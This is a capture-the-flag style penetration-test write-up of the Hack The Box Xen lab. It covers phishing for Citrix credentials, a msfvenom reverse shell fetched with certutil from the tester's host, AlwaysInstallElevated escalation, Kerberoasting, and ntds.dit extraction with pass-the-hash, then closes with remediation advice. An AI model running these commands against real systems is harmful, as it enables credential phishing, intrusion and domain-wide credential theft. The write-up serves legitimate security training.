# Xen ### Scope {% code overflow="wrap" fullWidth="false" %} ``` Xen By [egre55](https://app.hackthebox.com/home/users/profile/1190) Humongous Retail operates a nationwide chain of stores. The company has reacted to several recent skimming incidents by investing heavily in their POS systems. Keen to avoid any further negative publicity, they have engaged the services of a penetration testing company to assess the security of their perimeter and internal infrastructure. Xen is designed to put your skills in enumeration, breakout, lateral movement, and privilege escalation to the test within a small Active Directory environment. The goal is to gain a foothold on the internal network, escalate privileges and ultimately compromise the domain while collecting several flags along the way. Entry Point: `10.13.38.12` ``` {% endcode %} ### Hosts * 10.13.38.12 ### Scans ```bash # 10.13.38.12 - Port scan sudo nmap -p- -T4 $IP --open -oN initial_.nmap PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 443/tcp open https # 10.13.38.12 - Service scan sudo nmap -p- -sV -sC $IP --open -oN service.nmap PORT STATE SERVICE VERSION 25/tcp open smtp | smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY | fingerprint-strings: | GenericLines, GetRequest: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | sequence of commands | sequence of commands | Hello: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | EHLO Invalid domain address. | Help: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY | NULL: |_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) 80/tcp open http Microsoft IIS httpd 7.5 |_http-server-header: Microsoft-IIS/7.5 |_http-title: Did not follow redirect to https://humongousretail.com/ | http-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: CITRIX | DNS_Domain_Name: htb.local | DNS_Computer_Name: CITRIX.htb.local | DNS_Tree_Name: htb.local |_ Product_Version: 6.1.7601 443/tcp open ssl/http Microsoft IIS httpd 7.5 |_ssl-date: 2023-08-17T12:50:38+00:00; +11s from scanner time. | ssl-cert: Subject: commonName=humongousretail.com | Subject Alternative Name: DNS:humongousretail.com | Not valid before: 2019-03-31T21:05:35 |_Not valid after: 2039-03-31T21:15:35 | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 |_ SSL2_DES_192_EDE3_CBC_WITH_MD5 |_http-title: Did not follow redirect to https://humongousretail.com/ |_http-server-header: Microsoft-IIS/7.5 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows # WFUZZ ## Files Target: http://humongousretail.com/FUZZ Total requests: 37050 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000006: 200 13 L 170 W 1107 Ch "LICENSE.txt" 000000069: 200 111 L 323 W 3433 Ch "index.html" 000000379: 200 111 L 323 W 3433 Ch "." 000000984: 200 2 L 12 W 97 Ch "readme.txt" 000021775: 403 29 L 92 W 1233 Ch "WEB-INF." ## Directories Target: http://humongousretail.com/FUZZ/ Total requests: 62284 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000015: 403 29 L 92 W 1233 Ch "css" 000000009: 403 29 L 92 W 1233 Ch "js" 000000002: 403 29 L 92 W 1233 Ch "images" 000000056: 403 29 L 92 W 1233 Ch "aspnet_client" 000000354: 403 29 L 92 W 1233 Ch "WEB-INF" 000001059: 200 33 L 87 W 1158 Ch "remote" 000001248: 403 29 L 92 W 1233 Ch "META-INF" 000001705: 403 29 L 92 W 1233 Ch "IMAGES" 000006484: 401 29 L 100 W 1293 Ch "jakarta" # Looking through the web pages found curl http://humongousretail.com/readme.txt A Pen created at CodePen.io. You can find this one at https://codepen.io/schlenges/pen/mXvvLW. # The following require credentials - http://humongousretail.com/jakarta/ - http://humongousretail.com/remote/ ``` ### Write-up #### Foothold - 10.13.38.12 On the 'humongousretail.com' website, at the bottom, the tester found that the organisation is hiring and the provided email is ''.
This could be used for phishing later as it also mentions other departments such as store, retail, sales and legal. Also from enumeration, the following Citrix XenApp login has been found at ''. However, this required valid credentials.
Looking at the SMTP service on port '25', it wasn't possible to use it to enumerate users using the metasploit module. However, it was possible with 'smtp-user-enum'. ```bash # Command smtp-user-enum -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -D humongousretail.com -t 10.13.38.12 -m 50 -M RCPT # Output ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Mode ..................... RCPT Worker Processes ......... 50 Usernames file ........... /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt Target count ............. 1 Username count ........... 21168 Target TCP port .......... 25 Query timeout ............ 5 secs Target domain ............ humongousretail.com 10.13.38.12: it@humongousretail.com exists 10.13.38.12: legal@humongousretail.com exists 10.13.38.12: marketing@humongousretail.com exists 10.13.38.12: sales@humongousretail.com exists 10.13.38.12: SALES@humongousretail.com exists ``` The tester has used the SEToolKit to spoof the Citrix XenApp and try phish valid credentials. ```bash # Commands sudo setoolkit 1) Social-Engineering Attacks 2) Website Attack Vectors 3) Credential Harvester Attack Method 2) Site Cloner 10.10.14.6 https://humongousretail.com/remote/auth/login.aspx ## Fake Email - email.txt Hello everyone, Citrix Xen App has been updated. Please verify you can login: http://10.10.14.6/remote/auth/login.aspx If there are any issues, we\'ll send a follow up email on how to report them. Kind regards, IT Team # Use swaks to automate the email sent - retail and store did not exist swaks --to sales@humongousretail.com --from it@humongousretail.com --server 10.13.38.12 --port 25 --body email.txt swaks --to legal@humongousretail.com --from it@humongousretail.com --server 10.13.38.12 --port 25 --body email.txt swaks --to jointheteam@humongousretail.com --from it@humongousretail.com --server 10.13.38.12 --port 25 --body email.txt ``` A couple users have been phished successfully.
Using the credentials retrieved, login into the Citrix portal has been successful.
The tester had to install the correct application to receive the connection. ```bash # Citrix receiver https://www.citrix.com/downloads/citrix-receiver/linux/receiver-for-linux-latest.html # Install dpkg -i icaclientWeb_13.10.0.20_amd64.deb ```
The environment was restricted and block alot of the functionality.
The tester created the following executable to spawn a cmd window and used smb to host it. ```bash ## hello.c #include int main() { system("C:\\Windows\\System32\\cmd.exe"); } # Compile into an executable x86_64-w64-mingw32-gcc hello.c -o hello.exe # Host it on an smbshare impacket-smbserver share . -smb2support ``` Using file explorer, it was not possible reach the smb share directly.
However, trying to access the share from within an application worked.
Right clicking on the binary and starting it has spawned a cmd shell. Another way was to create a shortcut.
The tester then created a meterpreter shell and transferred it across. ```bash # Meterpreter shell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=443 -f exe -o reverse.exe # Transfering across mkdir C:\Users\Public\temp && cd C:\Users\Public\temp certutil.exe -urlcache -split -f "http://10.10.14.6/reverse.exe" r.exe ``` Successful meterpreter shell received.
#### Privilege Escalation - 10.13.38.12 The tester has transferred a few tools across to enumerate the desktop. ```bash # Using meterpreter shell upload PowerUp.ps1 # Using citrix window powershell -ep bypass # Import module Import-module .\PowerUp.ps1 Invoke-AllChecks ```
As shown above, the 'AlwaysInstallElevated' registry key is set and can be abused in order to install a malicious file as system. The tester has used that to retrieve a system shell. ```bash # Metasploit use exploit/windows/local/always_install_elevated set session 1 set lhost 10.10.14.6 run ```
#### Domain - Lateral Movement Domain enumeration using the 'PowerView\.ps1' scripts. ```bash # Computers + nslookup added the IPs to each one Get-DomainComputer | Select Name name ---- DC 172.16.249.200 CITRIX 172.16.249.201 VDESKTOP3 172.16.249.205 VDESKTOP2 172.16.249.204 VDESKTOP1 172.16.249.203 LAPTOP1 LAPTOP2 LAPTOP3 LAPTOP5 LAPTOP6 WK01 WK02 WK03 WK04 WK05 WK06 WK07 WK09 # Shares Invoke-ShareFinder Name Type Remark ComputerName ---- ---- ------ ------------ ADMIN$ 2147483648 Remote Admin DC.htb.local C$ 2147483648 Default share DC.htb.local IPC$ 2147483651 Remote IPC DC.htb.local NETLOGON 0 Logon server share DC.htb.local SYSVOL 0 Logon server share DC.htb.local ADMIN$ 2147483648 Remote Admin CITRIX.htb.local C$ 2147483648 Default share CITRIX.htb.local Citrix$ 0 CITRIX.htb.local IPC$ 2147483651 Remote IPC CITRIX.htb.local ISOs 0 CITRIX.htb.local ISOs-TEST 0 CITRIX.htb.local ADMIN$ 2147483648 Remote Admin VDESKTOP3.htb.local C$ 2147483648 Default share VDESKTOP3.htb.local IPC$ 2147483651 Remote IPC VDESKTOP3.htb.local # Users + Service Princiapls get-DomainUser | Select Name, SamAccountName, ServicePrincipalName name samaccountname ServicePrincipalName ---- -------------- -------------------- Administrator Administrator Guest Guest krbtgt krbtgt kadmin/changepw Adam Larsson alarsson Juan Mendes jmendes Paul Morgan pmorgan Anita Wardel awardel xenserver-svc xenserver-svc print-svc print-svc mssql-svc mssql-svc Mark Turner mturner MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 app-svc app-svc Rajesh Prakash rprakash Isla Urquart urquarti Rosie Drew rdrew Francois Boucher fboucher Christina Meller cmeller Andrei Nagy anagy backup-svc backup-svc test-svc test-svc netscaler-svc netscaler-svc # Users + Admincount get-netuser | Select samaccountname,admincount samaccountname admincount -------------- ---------- Administrator 1 Guest krbtgt 1 alarsson jmendes pmorgan awardel xenserver-svc print-svc 1 mssql-svc mturner app-svc rprakash urquarti rdrew fboucher cmeller anagy backup-svc 1 test-svc netscaler-svc ``` Using the shares found, the tester tried to access them, however the current user did not have access. ```bash # Commands net view \\citrix\citrix$\ net view \\citrix\ISOs net view \\citrix\ISOs-TEST ```
As executables weren't working on the machine, the tester used 'Invoke-Kerberoast' from PowerView to find any kerberoastable accounts. ```bash # Command Invoke-Kerberoast ```
It was also possible to create a proxy through the meterpreter session and use Impacket. ```bash # Command route add 172.16.249.0/24 8 use server/socks_proxy start # Impacket proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.249.200 HTB.LOCAL/pmorgan:Summxxxxxxxxxxxxx -save -outputfile GetUserSPNs.out ```
Once the hash has been copied to a file and formatted to remove spaces and lines, 'hashcat' was used to crack the hash. ```bash # Get rid of spaces cat mturner.out | tr -d ‘[:space:]’ > mturner.hash # Command sudo hashcat -a 0 -m 13100 mturner.hash /usr/share/wordlists/rockyou.txt --force # Adding rules sudo hashcat -a 0 -m 13100 mturner.hash rockyou.txt -r OneRuleToRuleThemAll.rule --force sudo hashcat -a 0 -m 13100 mturner.hash rockyou.txt -r d3ad0ne.rule --force ```
The tester then tried to access the shares found earlier using the new credentials. ```bash # Connect to share net use \\citrix\citrix$ /u:mturner 4i******* ```
Once connected, the most interesting file was the 'private.ppk', the tester copied the file and transferred it across to the attacking machine. ```bash # Command cat private.ppk PuTTY-User-Key-File-2: ssh-rsa Encryption: aes256-cbc Comment: imported-openssh-key Public-Lines: 6 ``` Analysing the 'private.ppk ' turned out to be a SSH key, the network was scanned to find any ssh ports open.
Connecting to the 172.16.249.202 host on port 22 opens a NetScaler command line interface. ```bash # Command proxychains -q ssh mturner@172.16.249.202 ```
However, the 'mturner' user does not have access to perform the 'shell' command. The tester then tried to convert and crack the ssh-rsa key found. ```bash # Command puttygen private.ppk -O private-openssh -o private.pem # Password required # Using john to crack putty2john private.ppk > ppk.hash # No wordlists worked, searching online resulting in finding kwprocessor ./kwp basechars/full.base keymaps/en.keymap routes/2-to-16-max-3-direction-changes.route > keyboard_walks-2-to-16-3-direction # Crack with john john --wordlist=./keyboard_walks-2-to-16-3-direction ppk.hash ```
Googling default NetScaler accounts revealed it to be 'nsroot'. This proved to be successful. ```bash # Command proxychains -q ssh nsroot@172.16.249.202 -i private.pem ```
Within the root directory, there was an interesting capture file, 'scp' was used to copy it across to the attacking machine.
```bash # Command proxychains -q scp -i ./private.pem nsroot@172.16.249.202:/root/capture.cap . ``` Analysing the capture file using wireshark, several interesting packets have been captured.
The capture revealed a user login on port 80 in cleartext and also a service account 'netscaler-svc' performing a LDAP authentication, again in clear text. The tester then checked for password reuse for all the accounts previously enumerated. ```bash # Command proxychains -q crackmapexec smb 172.16.249.200 -u ./users.txt -p '#S3r********' --continue-on-success ```
The results showed that all service accounts were re-using the same password. An interesting account found was 'backup-svc'. The tester then checked if the DC has any ports open that would allow a remote connection. ```bash # Command proxychains -q nmap -sT -p 3389,5985,5986 172.16.249.200 -oN dc.nmap # Output PORT STATE SERVICE 3389/tcp open ms-wbt-server 5985/tcp open wsman 5986/tcp closed wsmans ``` 'Xfreerdp' was used to RDP into the DC using the backup service account. ```bash # Command proxychains -q xfreerdp /u:backup-svc /p:#S3r******** /w:1366 /h:768 /v:172.16.249.200 ```
#### Domain - Privilege Escalation
Checking the permissions, the tester found that the backup service account has 'SeBackupPrivilege' and 'SeRestorePrivilege'.\ To make file exfiltration easier, the tester logged in using 'evil-winrm', this also enabled all the privileges. ```bash # Command proxychains -q evil-winrm -i 172.16.249.200 -u backup-svc -p '#S3r********' ``` The tester then saved the SAM and SYSTEM files locally and transferred them to the attacking machine with 'evil-winrm'. ```bash # Commands reg save HKLM\SYSTEM SYSTEM.hive reg save HKLM\SAM SAM.hive download SYSTEM.hive download SAM.hive ``` Getting the 'ntds.dit' file didn't work as the file was in use. However the tester has used 'diskshadow' to be able to copy the file. It wasn't possible to use 'diskshadow' interactively, so a script was written locally then transferred across. ```bash ## copyScript.txt set verbose on set metadata C:\Users\backup-svc\Documents\temp\mata.cab set context persistent nowriters add volume c: alias hacked create expose %hacked% h: exec "C:\\Users\\backup-svc\\Documents\\temp\\copyNTDS.cmd" delete shadows volume %hacked% reset exit ## copyNTDS.cmd cmd.exe /c robocopy /B h:\windows\ntds\ C:\Users\backup-svc\Documents\temp\ ntds.dit # Ensure correct format unix2dos copyScript.txt unix2dos copyNTDS.txt # Commands run on the backup-svc shell diskshadow /s copyScript.txt # Transfer ntds.dit to local machine using evil-winrm download ntds.dit ``` Once the tester had the correct files, the hashes were dumped and used to log in as the administrator. ```bash # Command impacket-secretsdump -ntds ntds.dit -system SYSTEM.hive LOCAL ```
```bash # Command proxychains -q evil-winrm -i 172.16.249.200 -u administrator -H ```
### Clean up * Reset the virtual disks ```bash ## shadowreset.txt delete shadows all reset exit # Ensure correct format unix2dos shadowreset.txt # Upload using evil-winrm upload shadowreset.txt # Run diskshadow diskshadow /s shadowreset.txt ``` * Remove created files ```bash # host VDESKTOP3: 10.13.38.12 rmdir /S /Q C:\Users\Public\temp # host DC: 172.16.249.200 Remove-Item C:\Users\backup-svc\Documents\temp -Recurse ``` ### Root cause * User training - users clicked phishing link and logged into fake login page. * No multi-factor authentication for the Citrix Portal. * Normal user with privilege permissions - AlwaysInstallElevated. * Kerberoastable user - user with MSSQLSvc SPN. * Insecure password policy / user training. * TGS-REP hash cracked. * private.ppk / ssh-rsa key cracked. * password reuse - service accounts with same password across the whole domain. * Insecure cleartext protocols. * HTTP - user password captured. * LDAP - service account password captured. ### Executive Summary In the recent comprehensive security assessment, several critical vulnerabilities have been identified within the organisation's infrastructure that require immediate attention. These vulnerabilities stem from various root causes, each posing a significant threat to the confidentiality, integrity, and availability of information and assets. 1. **Lack of User Training Against Phishing:** A significant vulnerability stems from inadequate user training regarding phishing threats. Users have fallen victim to phishing attacks by clicking on malicious links and providing their credentials on fake login pages. Additionally, the absence of multi-factor authentication increases the risk of unauthorised access. 2. **User With Privileged Permissions:** The presence of normal users with elevated privilege permissions exposes the organisation to privilege escalation attacks. Malicious actors can exploit this vulnerability to gain unauthorised access and control over critical systems. 3. **Normal Users With Service Principal Names (SPNs):** The existence of users with SPNs that are no longer in use increases the risk of Kerberoasting attacks, which can lead to the compromise of Active Directory credentials. 4. **Weak Password Policies:** Insecure password policies and password reuse practices can lead to severe security weaknesses. Short and easily guessable passwords can be cracked easily and lead to unauthorised access. Additionally, the reuse of passwords heightens the risk of lateral movement by attackers. 5. **Insecure Cleartext Protocols:** Clear text protocols cannot handle any level of encryption and therefore send sensitive information such as usernames and passwords in clear text, which exposes data to a breach of confidentiality. An attacker with access to the network can eavesdrop on the traffic and retrieve valid accounts, which can in turn be used to gain unauthorised access to services. In conclusion, the assessment has unveiled critical vulnerabilities within the organisation's security framework. Addressing these root causes requires a holistic approach, encompassing user education, privilege management, enhanced password policies, and secure communication protocols. By promptly implementing the recommended measures, it will significantly enhance the security posture, safeguard sensitive information, and fortify the resilience against evolving cyber threats. ### Recommendation * Review and minimise the usage of SPN accounts that are no longer in use. * Remove the MSSQLSvc if it's no longer required. * Use secure protocols to protect against malicious users eavesdropping on the traffic. * Switch HTTP to HTTPS * Switch LDAP to LDAPS * Encrypt sensitive information in transit. * Employ multi-factor authentication within the organisation, starting with critical systems like the Citrix Portal. * Implementing regular and comprehensive security awareness training for all users so that phishing emails can be spotted and reported. * Adjusting user permissions to adhere to the principle of least privilege, restricting unnecessary administrative access to prevent privilege escalation attacks. * Remove 'AlwaysInstallElevated' from users. * Implement strong password policies * It is recommended to implement a password manager. * Encourage unique passwords. * Strictly prohibit password reuse. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentester-inc.gitbook.io/journey/pwned-machines/hack-the-box-htb/xen.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.